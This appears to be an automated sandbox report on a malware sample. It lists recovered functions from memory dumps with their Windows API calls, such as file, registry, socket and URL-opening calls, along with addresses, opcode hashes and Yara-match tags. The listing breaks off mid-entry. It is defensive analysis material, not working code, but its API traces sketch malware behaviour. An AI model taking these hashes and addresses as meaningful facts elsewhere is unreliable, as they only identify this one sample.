Instruction ID: 77268f4053ecc5498fa3e7ea9e963c2ad6f5e6c7493ddd03fd4c92e9326787df
Opcode Fuzzy Hash: ab525eb97a44b816d4958a5a4b2ff4669a360e04a3d27001a7677b9f16b96990
Instruction Fuzzy Hash: 3331A172004380AFF722CF11DC45FA6FBB8EF06714F04859EFA859A192D2B5A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 007B07F4, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 007B0899

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b5bd6eb51c15cd04aed4848b91f1d85e7a2f5ff162c403340efd1440925fa59f
Instruction ID: 1837495cfe8d5964a9bd4f9d396d5a086ee2d008202c7057eebb24610020288d
Opcode Fuzzy Hash: b5bd6eb51c15cd04aed4848b91f1d85e7a2f5ff162c403340efd1440925fa59f
Instruction Fuzzy Hash: 33316FB1504340AFE722CB65DC45FA6BFE8EF05210F0884AEE9858B252D375E909DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 007B00F6, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 007B019D

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: bf07effcab9ab265eaba056176a3f2b7fdec11b02bb0d6ee14765ce08ae46711
Instruction ID: 97cc8dbba004f118281af56944950e43bcf00e1a2204b9ee767d26ed78bd0bad
Opcode Fuzzy Hash: bf07effcab9ab265eaba056176a3f2b7fdec11b02bb0d6ee14765ce08ae46711
Instruction Fuzzy Hash: 113193B1509784AFE711CB65DC85B96BFF8EF06350F08849AE984CB293D375A908C762

Uniqueness

Uniqueness Score: -1.00%

Function 007B26E8, Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B2785

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: f231f1552c371a069aacb5c2e7ceeedef758706bc1abd7ac11b724a4ca507c00
Instruction ID: dcda2c7b7e4289a6f18c621870dfd19add4129708b84261ffc834d0805bd7c83
Opcode Fuzzy Hash: f231f1552c371a069aacb5c2e7ceeedef758706bc1abd7ac11b724a4ca507c00
Instruction Fuzzy Hash: 6631E6B2505380AFE722CF60DC45F96BFB8EF06310F0884DAE985DB193D265A949C775

Uniqueness

Uniqueness Score: -1.00%

Function 007B0FB9, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B105C

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 0d87733f2e2cf45ac6019f1e30a94df87afa82f0e9510973d365f227fa66f655
Instruction ID: 57867f25505ca6932352ddaa85700aa61343a752f7e7b0db2c8fa4f52470788e
Opcode Fuzzy Hash: 0d87733f2e2cf45ac6019f1e30a94df87afa82f0e9510973d365f227fa66f655
Instruction Fuzzy Hash: 23312572109384AFE712CB24DC45F96BFA8EF43310F0884DAE984CF193D664A908C771

Uniqueness

Uniqueness Score: -1.00%

Function 00284485, Relevance: 1.6, APIs: 1, Instructions: 88networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 0028456A

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: b3703f34790241f861ef45fd5311f32d83a2802e64243704151fc9cee4e9872a
Instruction ID: 1ca09d3cd1e39cbbe972eb000bdd79f8f269d6e98fcc5232c0530025ec920041
Opcode Fuzzy Hash: b3703f34790241f861ef45fd5311f32d83a2802e64243704151fc9cee4e9872a
Instruction Fuzzy Hash: 8231483826A3839BFF35BE10CD51BFE37A59F01350F608525AD1A9A0D1E3B58964E711

Uniqueness

Uniqueness Score: -1.00%

Function 007B04AB, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B055C

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8e249ab77066684aca13fff5ed1e7032026f09d3bef97648898c4ebfaabe778b
Instruction ID: 0e80afb617cdfe069cc08a89ca4789e54c8367acad525d90d2148646e6595424
Opcode Fuzzy Hash: 8e249ab77066684aca13fff5ed1e7032026f09d3bef97648898c4ebfaabe778b
Instruction Fuzzy Hash: 7A318471509780AFD722CB65DC44F93BFF8EF06310F0885DAE9859B593D264A908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00287801, Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0028799D

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f391eab2b63e64cd790774c3f35629694828b6b80253129a93557742cce8dc8c
Instruction ID: 8c7262ce22ef5c68edc21f42a2b3fa99dbc1a66b89c4d0213d5618f8ec878fd7
Opcode Fuzzy Hash: f391eab2b63e64cd790774c3f35629694828b6b80253129a93557742cce8dc8c
Instruction Fuzzy Hash: D621812D63F216CDEB157E24C81C7A826A2FF52310F794696CC0A8B5E1C3A4C8E5E742

Uniqueness

Uniqueness Score: -1.00%

Function 002877D1, Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0028799D

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb76f5155e3a125f488492fefc08aacf1578a4d931a5581dd469c69ef2794e3e
Instruction ID: 4e85acda1142e869aa5107db3313d7c10061154f9b6be1ef91b6d12d58dc591c
Opcode Fuzzy Hash: eb76f5155e3a125f488492fefc08aacf1578a4d931a5581dd469c69ef2794e3e
Instruction Fuzzy Hash: 5021822C63F206CDEB147E24C5587A922A2BF55355F795256CC0B865E1C3B8C8E1E742

Uniqueness

Uniqueness Score: -1.00%

Function 00287781, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b87a3e809a4ef70d6a70c8668ce0bcfbf39add5139e99af9fad0c1e8914034
Instruction ID: 6f7b276c66fd241882fa17ded9dd71d00cb282276ce5239b499d6ef06125e7fc
Opcode Fuzzy Hash: f1b87a3e809a4ef70d6a70c8668ce0bcfbf39add5139e99af9fad0c1e8914034
Instruction Fuzzy Hash: 0121802D63F206CDEB157E24C4187A82692FF52355F785256C80E875E1C3B4C8A1E742

Uniqueness

Uniqueness Score: -1.00%

Function 002877C5, Relevance: 1.6, APIs: 1, Instructions: 85fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0028799D

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6127a266ff0abd2949621124caa31270462a423f97dbd971343b1857e367ddc6
Instruction ID: 0789249d209a58ba186788622d5dd43687c3c1103055cbc90f67fcd5aaceeb04
Opcode Fuzzy Hash: 6127a266ff0abd2949621124caa31270462a423f97dbd971343b1857e367ddc6
Instruction Fuzzy Hash: B0219F2C63F206CDEB157E24C5687A822A2FF51355F79525ACC0E8B5E1C3B4C8E1E742

Uniqueness

Uniqueness Score: -1.00%

Function 007B2287, Relevance: 1.6, APIs: 1, Instructions: 83fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 007B232E

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: d35404f26518d41944edc8da49e76d63c80ada8b2d18dcafeec450fb23f3bbfd
Instruction ID: 473d6737039b9a0f0bd6de7103e3ea1b76a83d70a458a389896a01fd279e0870
Opcode Fuzzy Hash: d35404f26518d41944edc8da49e76d63c80ada8b2d18dcafeec450fb23f3bbfd
Instruction Fuzzy Hash: F331C072405380AFE722CB55CC45F96FFE8EF06210F08859AE9848B192D379A809CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00287859, Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0028799D

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eafea455674bb56e45f7fd12a8917b0486cce2e307b74d533a5745fc55e12090
Instruction ID: f251bcf77e8ef385112e10fa5fdffb66e4caa2f3c19c594d288c4469bdfdb3de
Opcode Fuzzy Hash: eafea455674bb56e45f7fd12a8917b0486cce2e307b74d533a5745fc55e12090
Instruction Fuzzy Hash: C121922C63F217CDDB257E24C81C7A83652FF52355F794686C80A8B5E1C3A4C8E5E752

Uniqueness

Uniqueness Score: -1.00%

Function 002844A4, Relevance: 1.6, APIs: 1, Instructions: 82networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 0028456A

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: eea6626b94ccc2550e830742c4dc516b2402c86eecc718328662e2264e648821
Instruction ID: dfca07d18ba26f784d3fc5d646e3c3c9a23e27996df028e08fe7ce2821f4c8bd
Opcode Fuzzy Hash: eea6626b94ccc2550e830742c4dc516b2402c86eecc718328662e2264e648821
Instruction Fuzzy Hash: 28210738276347DBFB34BE14CD81BFE33A99F05340F604425AD0A9A0C1E3B99964AB11

Uniqueness

Uniqueness Score: -1.00%

Function 007B2D25, Relevance: 1.6, APIs: 1, Instructions: 80networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B2DBA

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: ae8f80b317e7f1c26e7f30e1b2abef5f160e07a86eede28c6cf3975fbb741c69
Instruction ID: 5191ca59bab46086113218a6a694bac1dec85021b21fd0ead0787331cce54a8b
Opcode Fuzzy Hash: ae8f80b317e7f1c26e7f30e1b2abef5f160e07a86eede28c6cf3975fbb741c69
Instruction Fuzzy Hash: 6721AEB2404344AFEB22CF51DC44FA7BBECEF45310F0489AAF9859B152D275A909DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 007B0EDE, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,00000EA4), ref: 007B0F5B

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f23660306c9ae6661c18e6691bb5cc65f683a294d26c2d52066f88d3f63e2ff4
Instruction ID: b152dbab43fd0009040177451de4171aaee0e357f8f3040e982917a80cf1acfb
Opcode Fuzzy Hash: f23660306c9ae6661c18e6691bb5cc65f683a294d26c2d52066f88d3f63e2ff4
Instruction Fuzzy Hash: 6421BD72600304EFEB21CF61DC85FABFBACEF04360F04896AF9458A541D674E9499BA1

Uniqueness

Uniqueness Score: -1.00%

Function 002844C9, Relevance: 1.6, APIs: 1, Instructions: 80networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 0028456A

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: db13d995239dd1d88d47149384543ef223a9240c80e6cdff75e68af78211353a
Instruction ID: 3417e0c22fbdfe68e67de12606d69345bf00f3a2093a2eb34d9598a3c8311c0e
Opcode Fuzzy Hash: db13d995239dd1d88d47149384543ef223a9240c80e6cdff75e68af78211353a
Instruction Fuzzy Hash: 6021243816A383DBFB35BE14CD51BFE37A95F11380F608429AD0A9A0D1E3B59524EB21

Uniqueness

Uniqueness Score: -1.00%

Function 007B02AB, Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,00000EA4), ref: 007B0353

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: d8133bcfb21dc95664ca546ade8f44fb91a96f1fd1d951fa194a8beb28cbfd7b
Instruction ID: 3cc0796459d41a289c8aa54b765aa633295b105edc3ce75c6b29b86725bc4c9a
Opcode Fuzzy Hash: d8133bcfb21dc95664ca546ade8f44fb91a96f1fd1d951fa194a8beb28cbfd7b
Instruction Fuzzy Hash: 3F21B571109380AFE7228F10DC45FA6BFB4EF06310F0884DAE9849B193D275A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 007B08F0, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B0985

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: b19c99b506b97df4061d8c2f4097e9afabb14d1f935028c5ef739f0b900073a8
Instruction ID: d5a7fd26a9a11413c04affd33b567d7d8f63512b74028eaf293c227a85ceeb69
Opcode Fuzzy Hash: b19c99b506b97df4061d8c2f4097e9afabb14d1f935028c5ef739f0b900073a8
Instruction Fuzzy Hash: BD210AB6508780AFE712CB159C41BA3BFA8EF46320F0881DAF9848B193D264A905C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 007B219A, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 007B2225

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 46ff94a23d28d6813078813c1fbee85b20f818aa85c72ea443a1e68c26a85b19
Instruction ID: 4c30572b2ee4aa0be8d6a8c4663e21989fcd313a989e30a8153a348bfb44a723
Opcode Fuzzy Hash: 46ff94a23d28d6813078813c1fbee85b20f818aa85c72ea443a1e68c26a85b19
Instruction Fuzzy Hash: A521A3B1505380AFE721CB65DC45FA6FFE8EF05310F0884AAED84DB292D375A905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 007B1A3A, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 007B1AC6

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 796fe4f11dbc4752235f573e9e2eb333d1c3f46dee0bce3af058727fbe672b98
Instruction ID: 2a955a17bfb8b6cdc5bedfcf9488b7d15fca9efbff9475b076a53db9772ac5b9
Opcode Fuzzy Hash: 796fe4f11dbc4752235f573e9e2eb333d1c3f46dee0bce3af058727fbe672b98
Instruction Fuzzy Hash: 14218071505780AFE722CF51DC45F96FFB8EF05310F08849EE9858B692D375A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 007B2E1E, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B2EAE

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: 5007dc83c3f8dd0919e2ffb861479e2f60b7e68a91d56d800153356584e85f61
Instruction ID: 3825e9e0efa2e48a5e17b15c7890941cc66633a5b2f09e5045644286b0cff75c
Opcode Fuzzy Hash: 5007dc83c3f8dd0919e2ffb861479e2f60b7e68a91d56d800153356584e85f61
Instruction Fuzzy Hash: A121AE72405344AFEB22CF51DC44F97BBB8EF05310F08859AF9859B552D275A909CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007B05B0, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000EA4,?,?), ref: 007B064E

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: b7cd7b8e4bdd23c2ade9452c6d56beab2b7d6e56e62ddf6a36eb8c03523b53b4
Instruction ID: 58618495f2fa747543c41b7651abd883ac09ed5d07814ef085542f0d0f736e92
Opcode Fuzzy Hash: b7cd7b8e4bdd23c2ade9452c6d56beab2b7d6e56e62ddf6a36eb8c03523b53b4
Instruction Fuzzy Hash: BD21717550E3C0AFD3128B758C55B62BFB4EF47610F1981CBD8848F693D225A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 002844E5, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 0028456A

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: f73f6075964d6505937eb1bcceabd9b9578217c09d547e7f98aff6244e1943aa
Instruction ID: e63adbe73442c30274c57c256921e5e8bd589f1bd2d88c36fd4a70e3c7af5b5d
Opcode Fuzzy Hash: f73f6075964d6505937eb1bcceabd9b9578217c09d547e7f98aff6244e1943aa
Instruction Fuzzy Hash: 222104392663539BEB35BD14DD90BFE27999F15350F608428ED0ADA0C1F3B49520A710

Uniqueness

Uniqueness Score: -1.00%

Function 007B081A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 007B0899

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 22ec6d1a26cac638c03647254df391ab02ac4a29dd85f32d5d9e58a5fad2e3f5
Instruction ID: af530fce1798861026b6a7f61a2c5b0be6d94b0cac848ae07836db9b2b6ce67d
Opcode Fuzzy Hash: 22ec6d1a26cac638c03647254df391ab02ac4a29dd85f32d5d9e58a5fad2e3f5
Instruction Fuzzy Hash: 26219D71500700EFEB21DF65DC85BA6FBE8EF08710F14846EE9898B652D775E904CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 007B0B79, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B0C10

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 841e53d45e7d15087042424595c16c4af6f9903ac8caab6d0e5b6cebaef13109
Instruction ID: 4f5d315fec315131942ca0626223f1576593d2eb9fc668ff33e69c4fbbce4053
Opcode Fuzzy Hash: 841e53d45e7d15087042424595c16c4af6f9903ac8caab6d0e5b6cebaef13109
Instruction Fuzzy Hash: E421AFB2504740AFE721CF11DC85F97BFA8EF05310F08859AF9859B292D364E908CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 007B03CA, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00000EA4), ref: 007B045E

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8089a4c0a117386a6b1b480141b374ab58c3f2c2c94c88b49cb28cd179ddfc30
Instruction ID: 038aa220cc30eced5837ae212be27036a526c4e37fdccbe7bf363f2fb57c3f1f
Opcode Fuzzy Hash: 8089a4c0a117386a6b1b480141b374ab58c3f2c2c94c88b49cb28cd179ddfc30
Instruction Fuzzy Hash: E221D172100304AFFB31DF15DC81FA7FBA8EF05710F04895AFA859A181D6B5AA49DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 007B09C0, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B0A51

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: ca3aefe0b5690169fa4c0996cf45e7d8d99969f55dd675ba099a24bf279138b9
Instruction ID: 84c9062d694e9a4f3bda62b89bf4e9999262d58a7d03fd1aeea1278c1343dd52
Opcode Fuzzy Hash: ca3aefe0b5690169fa4c0996cf45e7d8d99969f55dd675ba099a24bf279138b9
Instruction Fuzzy Hash: 7E219272509380AFE722CF51DC44F96BFB8EF46314F09849BE9849B193C265A909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 007B2B3A, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B2BC1

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 1b6f51cad5f19f9d691d6eac93b6ae89c24aa2b31462eb914e14ca0db17a233d
Instruction ID: b24fb420f8a08fc23cc0ce8372460169dc814c41a9509e5fe856a4be2e77c925
Opcode Fuzzy Hash: 1b6f51cad5f19f9d691d6eac93b6ae89c24aa2b31462eb914e14ca0db17a233d
Instruction Fuzzy Hash: 0721AFB2505380AFE721CF11DC84F97FFB8EF45310F08849AE9489B192D264A908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 002828EC, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00282927

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 6902d71b18044bdddc4ac95d49e1109ed73abd1f63260acdcb0977ea237eb3ed
Instruction ID: e4ba5015de655e39a9821ce01b8b1f0b3a2e20eb7d80b3d53c0b7eae92524319
Opcode Fuzzy Hash: 6902d71b18044bdddc4ac95d49e1109ed73abd1f63260acdcb0977ea237eb3ed
Instruction Fuzzy Hash: D911267C137203EFDB20BA44C989BAA3614EF26324F310252E927571D6D3E5D8A59B26

Uniqueness

Uniqueness Score: -1.00%

Function 0028593D, Relevance: 1.6, APIs: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00286BDF,00282DA4,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 00285947

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9c52a9240b329afe6e212dfe62799060e82221a3b80a2baf7c766e31c257443b
Instruction ID: f1c5c07c1e2624467223dfd69f6e203ecec05e9f5a0e2673a32479ef806e8d75
Opcode Fuzzy Hash: 9c52a9240b329afe6e212dfe62799060e82221a3b80a2baf7c766e31c257443b
Instruction Fuzzy Hash: A821923D53AA35DBCF18AE1095E02EA27A1AE55350B768215EC4B27280D3B0AD20A781

Uniqueness

Uniqueness Score: -1.00%

Function 007B012A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 007B019D

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 74f13fcf8f5725a2814888c0b572f861fac8e40de8d5310431b9ac7f9e84f31f
Instruction ID: 9094dde046cb8b3c9133ba167a368dbbc92095a33e88b0d8e2221d453c007a3a
Opcode Fuzzy Hash: 74f13fcf8f5725a2814888c0b572f861fac8e40de8d5310431b9ac7f9e84f31f
Instruction Fuzzy Hash: C7219271500308EFE724DF69DC85BAAFBE8EF05350F04846AE9498B281D775E904CA62

Uniqueness

Uniqueness Score: -1.00%

Function 007B0723, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,5C79B353,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 007B079F

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d6639649f17d2787fd8b390fa3150997aea08a4b07a0da08cd660a3de7a928cb
Instruction ID: 81788a6ed55f8d6bc15de6436bcdaf69c47180427fac43279ccc037457b9d012
Opcode Fuzzy Hash: d6639649f17d2787fd8b390fa3150997aea08a4b07a0da08cd660a3de7a928cb
Instruction Fuzzy Hash: 992180B65093809FDB11CB25DC85B96BFE8EF16210F0984EAE889CF553D674E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 007B10BF, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,00000EA4), ref: 007B114B

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 6a0cceb251aabe52e20130e4ec242b4b8c9d581653c88569573f48fc49c38fd7
Instruction ID: 9cda6f3540a553567fab0a94318a8138316d0ca4efe9254738f0694d4a06de43
Opcode Fuzzy Hash: 6a0cceb251aabe52e20130e4ec242b4b8c9d581653c88569573f48fc49c38fd7
Instruction Fuzzy Hash: D2212B71504384AFE721CB14DC45FA6BFA8DF41310F18809AFD448B182D3B4A904CB62

Uniqueness

Uniqueness Score: -1.00%

Function 007B0A9B, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 007B0B1E

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 5e02f94c5b58b93fb756c1eee0da2911747b4ada6e9af088af5b4bca300ef620
Instruction ID: 8e57fbcfb701fdc7d56a03d10094a640979959f2e75db66ac96f769c4881e149
Opcode Fuzzy Hash: 5e02f94c5b58b93fb756c1eee0da2911747b4ada6e9af088af5b4bca300ef620
Instruction Fuzzy Hash: 952195B15043805FD722CB25DC55B93BFE8EF16314F0980DAE984DB253D665D804C771

Uniqueness

Uniqueness Score: -1.00%

Function 002854A5, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 002854AF

